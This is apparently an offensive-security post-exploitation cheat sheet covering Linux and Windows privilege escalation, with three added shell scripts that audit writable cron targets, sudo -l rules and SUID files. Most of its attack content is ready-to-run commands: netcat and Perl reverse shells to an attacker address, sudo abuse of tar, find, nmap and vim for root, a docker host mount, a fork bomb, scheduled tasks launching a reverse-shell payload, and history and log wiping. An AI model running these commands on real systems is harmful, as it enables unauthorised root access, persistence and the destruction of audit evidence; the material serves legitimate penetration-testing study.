Offensive Security Testing Guide - Post Exploitation
Operating System
Windows
Interesting Path
dir %USERPROFILE%
dir "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
(the per-user Startup folder: anything placed there runs at the next logon, so check it for persistence and for writable targets)
Information Gathering
Check IP Information
https://www.localizaip.com.br/api/iplocation.php
Privilege Escalation - Linux
Reference: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
C Compiler
gcc <exploit>.c -o <exploit> 2>&1
Troubleshooting
Path environment variable (if a compiled exploit or tool is reported as "not found", run it by full path or add its directory to PATH)
echo $PATH
export PATH=$PATH:<directory_containing_the_executable>
Nmap
Interactive mode only exists in Nmap versions before 5.21; on such a version, if nmap is SUID root or allowed via sudo, !sh drops to a root shell:
sudo nmap --interactive
!sh
Schedule/Cron Job
cat /etc/crontab
Linux (Sudo -l)
sudo -l       # list the commands this user may run via sudo (and whether NOPASSWD applies)
sudo su       # if the user may run ALL, switch straight to root
bash shell (.sh) file
If a script that root runs (via sudo or cron) is writable by the current user, replace its body with one of the following.
Spawn a shell:
#!/bin/sh
/bin/bash
Reverse shell (start a listener on <attacker_ip_address> port 8099 first):
#!/bin/sh
rm -f /tmp/fa; mkfifo /tmp/fa; cat /tmp/fa|/bin/sh -i 2>&1|nc <attacker_ip_address> 8099 > /tmp/fa
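The precondition for both the cron-job and the .sh-file technique above is a root-run script that the current user can modify. The following added example (it is not part of the original guide) parses a system-format crontab and reports entries whose command is an absolute path writable by the caller; the crontab, the script paths and the temporary directory it uses are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original guide): find system cron entries whose
# target script or binary the current user can write to. A root-owned cron
# job that runs a writable file is exactly the precondition for replacing the
# script body shown above. All paths and the sample crontab are constructed.

# writable_cron_targets CRONTAB_FILE
# Reads a crontab in system format (m h dom mon dow user command, or
# @reboot/@daily user command). For every entry whose command starts with an
# absolute path that is writable by the caller, prints
# "<entry> -> <target> (writable)". Returns 0 if at least one was found.
writable_cron_targets() {
    crontab_file=$1
    found=1
    while IFS= read -r line; do
        case "$line" in
            ''|\#*) continue ;;            # blank or comment
            [A-Za-z_]*=*) continue ;;      # VAR=value line (SHELL=, PATH=, ...)
        esac
        # @reboot-style entries carry the command in field 3, timed ones in 7.
        target=$(printf '%s\n' "$line" | awk '{ print ($1 ~ /^@/) ? $3 : $7 }')
        case "$target" in
            /*) ;;                         # only absolute paths are checked
            *) continue ;;                 # "cd", "test", bare names: skip
        esac
        if [ -w "$target" ]; then
            printf '%s -> %s (writable)\n' "$line" "$target"
            found=0
        fi
    done < "$crontab_file"
    return $found
}

# make_cron_fixture: constructed sample for the demonstration. Creates a temp
# directory with a world-writable script, a read-only script and a fake
# system crontab referring to both; echoes the crontab path.
make_cron_fixture() {
    d=$(mktemp -d)
    printf '#!/bin/sh\nexit 0\n' > "$d/backup.sh"
    printf '#!/bin/sh\nexit 0\n' > "$d/rotate.sh"
    chmod 0777 "$d/backup.sh"   # anyone can replace its body
    chmod 0555 "$d/rotate.sh"   # not writable (unless you already are root)
    cat > "$d/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
17 *    * * *   root    $d/rotate.sh
*/5 *   * * *   root    $d/backup.sh --quiet
@reboot         root    $d/backup.sh
EOF
    echo "$d/crontab"
}

# Demo on the constructed fixture. On a real host run it against /etc/crontab
# and against each file under /etc/cron.d.
writable_cron_targets "$(make_cron_fixture)"
```

The check deliberately ignores entries whose command is a shell builtin or a bare name resolved through PATH; those are a different (PATH-hijack) question and need the cron PATH= line, not the file mode.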
TAR
GNU tar runs --checkpoint-action as the invoking user, so a sudo rule for tar gives a root shell:
echo "dummy" > dummy.txt
tar cf compress.tar dummy.txt
sudo tar -xf compress.tar --checkpoint=1 --checkpoint-action=exec='echo $(id)'    # proof: prints uid=0(root)
sudo tar -xf compress.tar --checkpoint=1 --checkpoint-action=exec='/bin/bash'
Perl (reverse shell; start a listener on <attacker_ip_address> port 8099 first)
sudo perl -e 'use Socket;$i="<attacker_ip_address>";$p=8099;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
find (spawns an interactive shell for each matched path; exit returns you to the next one)
sudo find /home -exec sh -i \;
Privileged User (when sudo -l only allows running commands as a specific non-root user)
sudo -u <privileged user> bash -i
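The sudo -l rules above (tar, perl, find, and running as another user) are found by reading sudo -l output by hand. As an added example that is not part of the original guide, the script below triages captured sudo -l output against a watch list of programs that give a shell or arbitrary file writes when run under sudo; the watch list is a starting point of well-known binaries and the sample sudo -l output is constructed.

```shell
#!/bin/sh
# Added example (not from the original guide): triage the output of "sudo -l"
# against a watch list of programs that can spawn a shell or write arbitrary
# files when run under sudo (the binaries abused above plus a few common
# ones). The sample "sudo -l" output below is constructed.

# Starting watch list; extend it (e.g. from GTFOBins) for what you find.
SUDO_WATCHLIST="tar perl find nmap vim vim.basic vi bash sh less awk python python3 env"

# triage_sudo_l FILE
# FILE holds captured "sudo -l" output. Prints "<basename>: <command spec>"
# for each rule whose program is on the watch list; returns 0 if any matched.
triage_sudo_l() {
    awk -v watch="$SUDO_WATCHLIST" '
        BEGIN { n = split(watch, w, " "); for (i = 1; i <= n; i++) want[w[i]] = 1 }
        /may run the following commands/ { in_rules = 1; next }
        !in_rules { next }                                  # skip the Defaults block
        {
            line = $0
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)         # drop "(runas : group)"
            n = split(line, specs, ",")                     # several commands per rule
            for (i = 1; i <= n; i++) {
                spec = specs[i]
                gsub(/(NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC):/, "", spec)
                sub(/^[ \t]+/, "", spec)
                sub(/[ \t]+$/, "", spec)
                split(spec, words)                          # words[1] is the program
                base = words[1]
                sub(/.*\//, "", base)                       # basename of the program
                if (base in want) { print base ": " spec; hit = 1 }
            }
        }
        END { exit hit ? 0 : 1 }
    ' "$1"
}

# make_sudo_l_fixture: constructed sample of "sudo -l" output for user alice.
make_sudo_l_fixture() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
Matching Defaults entries for alice on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User alice may run the following commands on host:
    (ALL) NOPASSWD: /bin/tar
    (root) /usr/bin/find
    (ALL : ALL) /usr/bin/systemctl status nginx
    (root) NOPASSWD: /usr/bin/perl, /usr/bin/less
EOF
    echo "$f"
}

# Demo on the constructed sample. On a real host: sudo -l > /tmp/sudo_l.txt
# and pass that file instead.
triage_sudo_l "$(make_sudo_l_fixture)"
```

Rules that restrict arguments (the systemctl line in the sample) are printed with their full spec when the program matches, because whether a fixed argument list is still abusable depends on the program, not on the rule.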
Linux (Sudo -i)
Current user is a member of the sudo (sudoers) group or has ALL in sudoers:
sudo -i
Linux (SUID)
find / -user root -perm -4000 -print 2>/dev/null     # SUID root binaries
find / -type f -perm /6000 2>/dev/null               # SUID or SGID files (GNU find; the old +6000 spelling is deprecated)
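The two find commands list every setuid/setgid file, most of which are the distro's own. As an added example that is not part of the original guide, the script below lists setuid/setgid files under a directory and reports only those missing from a baseline of expected binaries; the baseline is a constructed starting list of common Debian/Ubuntu setuid programs and the fixture directory is constructed for the demonstration, so both must be tuned for the real target.

```shell
#!/bin/sh
# Added example (not from the original guide): list setuid/setgid files under
# a directory and report the ones missing from a baseline of binaries that
# are expected to be setuid on a typical distro. Anything unexpected (a custom
# backup tool, a copied shell) is where to look first. The baseline and the
# fixture directory are constructed; tune the baseline per distro.

# find_suid_sgid DIR
# Regular files with setuid or setgid set, one path per line, sorted.
# (-perm -4000 -o -perm -2000 is the portable spelling of GNU find's /6000.)
find_suid_sgid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# unexpected_suid DIR BASELINE
# BASELINE holds one expected basename per line; prints the setuid/setgid
# files under DIR whose basename is not in it.
unexpected_suid() {
    find_suid_sgid "$1" | while IFS= read -r path; do
        base=${path##*/}
        grep -qxF -- "$base" "$2" || printf '%s\n' "$path"
    done
}

# make_suid_fixture: constructed sample tree. Echoes its root directory;
# the baseline is written to <root>/baseline.txt.
make_suid_fixture() {
    d=$(mktemp -d)
    mkdir "$d/bin"
    for f in passwd sudo backup_tool sgid_helper normal; do
        printf '#!/bin/sh\nexit 0\n' > "$d/bin/$f"
    done
    chmod 4755 "$d/bin/passwd" "$d/bin/sudo" "$d/bin/backup_tool"   # setuid
    chmod 2755 "$d/bin/sgid_helper"                                  # setgid
    chmod 0755 "$d/bin/normal"                                       # neither
    # Starting baseline: common Debian/Ubuntu setuid binaries (constructed list).
    printf '%s\n' passwd sudo su mount umount chsh chfn newgrp gpasswd ping \
        pkexec fusermount3 > "$d/baseline.txt"
    echo "$d"
}

# Demo on the fixture. On a real host: unexpected_suid / /path/to/baseline.txt
fixture=$(make_suid_fixture)
unexpected_suid "$fixture" "$fixture/baseline.txt"
```

Matching on basename keeps the baseline short, but it also means a root-owned setuid copy of bash renamed to "passwd" would be hidden; compare package ownership (dpkg -S / rpm -qf) of anything on the list before trusting it.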
Vim.basic
If vim.basic is SUID root (or allowed via sudo), it edits any file as root:
vim.basic /etc/sudoers       # grant the current user a sudo rule
vim.basic /root/.bashrc      # or append the line below; it runs the next time root opens an interactive shell
adduser <username> sudo      # add at the bottom of /root/.bashrc (the new group applies to your next login)
:(){ :|: & };:               # fork bomb: destructive and extremely noisy, it takes the host down
sudo bash                    # once the user has sudo rights
Linux (Interesting Directory/File)
ls /etc/cron.daily
Docker
Membership in the docker group is effectively root: mount the host filesystem into a container and read or edit it from there (host / appears as /opt inside the container):
docker run -it -v /:/opt bash bash
Privilege Escalation - Windows
Task Scheduler
Ref: https://github.com/SocialEngineeringNeo/Exploits/blob/master/Our%20Exploits/Microsoft/taskschdEoP_PoC.ps1
Windows 7 or below (PowerShell 3.0+ with the PSScheduledJob module):
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\axcelsec\Documents\payload.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger
Windows 8 or above (ScheduledTasks module; the task runs as the registering user unless -User/-RunLevel are set from an elevated session):
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\axcelsec\Documents\payload.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."
Clean Up
Truncating a log is itself conspicuous (the file shrinks and keeps a stray blank line), so remove only your own entries where you can. auth.log is the Debian/Ubuntu name; RHEL-family systems log logins to /var/log/secure.
echo '' > /home/<username>/.bash_history
echo '' > /root/.bash_history
echo '' > /var/log/auth.log
echo '' > /<path_to_apache_server>/access.log
history -c && kill -9 $$     # clear in-memory history, then kill the shell so it cannot write history back on exit